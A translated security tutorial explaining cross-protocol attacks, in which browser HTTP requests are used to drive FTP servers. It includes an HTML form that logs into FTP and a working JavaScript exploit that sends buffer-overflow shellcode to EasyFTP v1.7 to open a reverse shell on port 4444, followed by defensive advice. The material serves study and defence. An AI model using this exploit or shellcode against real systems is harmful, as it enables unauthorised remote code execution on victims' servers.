Cross-Protocol Communication Technology Utilization

#What is cross-Protocol Communication #
The cross-Protocol Communication Technology (Inter-Protocol Communication) refers to the technology in which two different protocols can exchange commands and data. One is called the target protocol and the other is called the carrier protocol. The target protocol is the Protocol we finally want to communicate with, and the carrier protocol is used to encapsulate the commands and data we finally want to send.
There are two necessary conditions for this type of communication to be completed:
1. The target protocol must have better fault tolerance. This is because we transmit instructions through a carrier protocol, which may be doped with commands that cannot be identified by the target protocol.
2. The carrier protocol can encapsulate the instructions of the target protocol. Even if the target Protocol cannot identify all encapsulated commands, it must be able to identify the final part of the commands.
 
#How to use cross-Protocol Communication #
Cross-Protocol Vulnerability exploitation (Inter-Protocol Expoitation) is a service that uses one Protocol to attack and run another Protocol.
When the carrier protocol is HTTP, attackers can launch attacks through browsers. This type of attack allows attackers to access resources and services that are only accessible to victims (such as services that are not open to the Internet through the Intranet ). In this process, the victim acts as a zombie and receives and executes risky code.
Some protocols that use line breaks as command delimiters, such as SMTP, POP3, IRC, and FTP are all affected by this attack. this is because when the target Protocol processes multiple rows of data, one row is processed separately. these protocols have better fault tolerance. this makes these protocols ignore unrecognized lines and only execute identifiable code.
To better understand cross-Protocol Communication, let's look at a simple example.
 
#Example 1: connect to the FTP server through HTTP #
It is very easy to connect to the ftp server through a browser, just an http post request. The following is the code for connecting to the local FTP server.

<form method='POST' action='http://localhost:21' enctype='multipart/form-data'><input type='hidden' name='a' value='user secforce'><input type='hidden' name='a' value='pass secforce'><input type='submit'></form>

If the FTP User Password exists, submit this form to log on to the FTP server. Is it very simple.
The specific POST request packet is as follows:

POST / HTTP/1.1Host: 127.0.0.1:21User-Agent: Mozilla/5.0 (X11; Debian; Linux x86_32; rv:16.0) Gecko/20110007 Firefox/20.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gb,en;q=0.5Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------63079936718166855021600323653Content-Length: 304 -----------------------------63079936718166855021600323653Content-Disposition: form-data; name="a" user secforce-----------------------------63079936718166855021600323653Content-Disposition: form-data; name="a" pass secforce-----------------------------63079936718166855021600323653--

The returned data is as follows. All 50X errors correspond to the HTTP lines that cannot be recognized by the server. The FTP server ignores them and executes the identifiable commands.

220--------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-Local time is now 12:41. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.530 You aren't logged in500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?500 ?331 User secforce OK. Password required500 ?500 ?500 ?230 OK. Current directory is /500 ?

If you test it yourself, you may find that not all FTP commands work properly. like MKD/RMD and DEL, GET/PUT, RETR/STOR cannot work normally. this is because FTP is an out-of-band protocol, and its data and control commands are transmitted through different TCP ports. in fact, if you try to use the STOR command to upload a file to the server, you will find that an empty file with the same name is created on the server. this is because an empty file is created before the file starts to transmit data. All commands can work without a separate data connection.
Let's look at a more interesting example.
 
# Example 2: reverse shell via HTTP overflow FTP server #
In this example, EasyFTP v1.7 is used. This version has the buffer overflow vulnerability of the MKD Command. note that this command can be successfully executed without an additional data connection channel. we set up the server (192.168.1.10) in the virtual machine to create the "anonymous" user. the prerequisite for successful exploitation of this vulnerability is to log on to the FTP server first.
Because there is no need to duplicate the wheel, here we use a public vulnerability exploitation code (refer to [1]) to construct a POST request. this time, we use javascript to send shellcode to the FTP server. to successfully send shellcode, we use the sendAsBinary function. For more information, see [2] [3].
The final function is as follows:

function exploit(){var url = 'http://192.168.1.10:21'var intro = 'USER anonymous\r\nPASS anonymous\r\n'var payload = 'MKD \x89\xe7\x81\xef\x10\xfe\xff\xff\xc7\x07\x13\x57\x7e\xd6\x81\xc7\x14\xff\xff\xff\xff\xe7\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\xba\xae\x16\xd0\x74\xd9\xcc\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x4c\xe3\x2c\x9c\x19\x0c\xcd\x5d\x79\x84\x28\x6c\xab\xf2\x39\xdd\x7b\x70\x6f\xee\xf0\xd4\x84\x65\x74\xf1\xab\xce\x32\x27\x85\xcf\xf3\xe7\x49\x13\x92\x9b\x93\x40\x74\xa5\x5b\x95\x75\xe2\x86\x56\x27\xbb\xcd\xc5\xd7\xc8\x90\xd5\xd6\x1e\x9f\x66\xa0\x1b\x60\x12\x1a\x25\xb1\x8b\x11\x6d\x29\xa7\x7d\x4e\x48\x64\x9e\xb2\x03\x01\x54\x40\x92\xc3\xa5\xa9\xa4\x2b\x69\x94\x08\xa6\x70\xd0\xaf\x59\x07\x2a\xcc\xe4\x1f\xe9\xae\x32\xaa\xec\x09\xb0\x0c\xd5\xa8\x15\xca\x9e\xa7\xd2\x99\xf9\xab\xe5\x4e\x72\xd7\x6e\x71\x55\x51\x34\x55\x71\x39\xee\xf4\x20\xe7\x41\x09\x32\x4f\x3d\xaf\x38\x62\x2a\xc9\x62\xeb\x9f\xe7\x9c\xeb\xb7\x70\xee\xd9\x18\x2a\x78\x52\xd0\xf4\x7f\x95\xcb\x40\xef\x68\xf4\xb0\x39\xaf\xa0\xe0\x51\x06\xc9\x6b\xa2\xa7\x1c\x3b\xf2\x07\xcf\xfb\xa2\xe7\xbf\x93\xa8\xe7\xe0\x83\xd2\x2d\x97\x84\x45\x62\xb8\x1a\x92\x12\xbb\x1a\x8b\xbe\x32\xfc\xc1\x2e\xec\x41\x40\x00\x3e\x23\x1f\x17\x95\xa3\xbc\x8a\x72\x33\xca\xb6\x2c\x64\x9b\x09\x25\xe0\x31\x33\x9f\x16\xc8\xa5\xd8\x92\x17\x16\xe6\x1b\xd5\x22\xcc\x0b\x23\xaa\x48\x7f\xfb\xfd\x06\x29\xbd\x57\xe9\x83\x17\x0b\xa3\x43\xe1\x67\x74\x15\xee\xad\x02\xf9\x5f\x18\x53\x06\x6f\xcc\x53\x7f\x8d\x6c\x9b\xaa\x15\x8c\x7e\x7e\x60\x25\x27\xeb\xc9\x28\xd8\xc6\x0e\x55\x5b\xe2\xee\xa2\x43\x87\xeb\xef\xc3\x74\x86\x60\xa6\x7a\x35\x80\xe3'var req = new XMLHttpRequest();req.open('POST', url, true);req.setRequestHeader('Content-Type', 'text/plain');req.setRequestHeader('Content-Length', '20');req.sendAsBinary(intro + payload + '\r\n'); // neat way to send hexadecimal code through HTTP}

Here, payload chooses to bounce shell to port 4444 on our host. Then we use nc to listen. When we access the webpage embedded with the above js code in the browser, a miracle has occurred.
 
# How to defend against attacks #
1. blocked port. by default, most browsers refuse to connect to some famous ports, such as 21/FTP, 25/SMTP. this protection method can be achieved by modifying the browser configuration or using a non-standard port.
2. less fault tolerance. some protocols close the connection when they receive unrecognized commands. this reduces flexibility but enhances the ability to defend against cross-protocol attacks. A better way is to close the connection after receiving unrecognized commands consecutively.
 
## Conclusion ##
As mentioned above, there are many restrictions on such attacks. generally, there are many better ways to achieve the same result than cross-protocol attacks. however, in a specific environment, this type of attack is a very effective method.